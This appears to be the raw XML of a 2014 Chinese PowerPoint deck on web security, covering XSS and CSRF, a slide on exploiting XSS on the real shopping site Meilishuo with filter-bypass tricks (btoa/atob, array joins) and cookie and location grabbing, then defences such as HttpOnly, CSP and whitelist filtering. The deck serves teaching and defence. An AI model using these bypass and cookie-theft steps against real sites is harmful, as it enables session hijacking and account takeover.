                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>flowStep{display:none;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>3C/style%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>3E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2873" y="29159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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>利用代码</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" alt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97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3569"/>
            <a:ext cx="6400800" cy="1362075"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>美丽说XSS详细利用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36445"/>
            <a:ext cx="7165976" cy="494693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/>
              <a:t>美丽说现状：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过滤了</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>号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显示在页面的数据全部被转为小写了</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>导致：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数据拼接</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>decodeURI</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>decodeURIComponent</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>突破：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>btoa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atob</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>array.push</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>()/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>array.join</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(‘’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>获取：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.browser/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>screen.width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screen.height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window.location</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/refer/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/system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799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2624" y="587375"/>
            <a:ext cx="803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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS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跨站脚本攻击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/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" sz="3600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>跨站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请求伪造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2624" y="1674673"/>
            <a:ext cx="833437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200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS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/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CSRF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具体</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>危害：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篡改页面</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US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操纵</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>用户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DDOS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>获取用户权限</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>获取管理员权限</a:t>
            </a:r>
          </a:p>
          <a:p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zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>衍生：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="28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获取网站权限、获取服务器权限、获取数据库权限、养马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199" y="92075"/>
            <a:ext cx="8228013" cy="1228725"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>预防措施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199" y="1545851"/>
            <a:ext cx="8228013" cy="3645274"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>加入</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>输出</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Header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CSP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>过滤使用白名单</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>富文本使用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>UBB</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>||</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Markdown</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>记录特殊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日志</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>前端不要直接取数据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8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318</TotalTime>
  <Words>612</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Paragraphs>105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起源</vt:lpstr>
      <vt:lpstr>WEB SAFE</vt:lpstr>
      <vt:lpstr>常见漏洞</vt:lpstr>
      <vt:lpstr>踩点</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>XSS常规利用</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>美丽说XSS详细利用</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>预防措施</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>强飞科技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WEB安全防范</dc:title>
  <dc:creator>吴 飞飞</dc:creator>
  <cp:lastModifiedBy>吴 飞飞</cp:lastModifiedBy>
  <cp:revision>32</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-05-15T11:58:25Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-05-16T03:48:59Z</dcterms:modified>
</cp:coreProperties>
</file>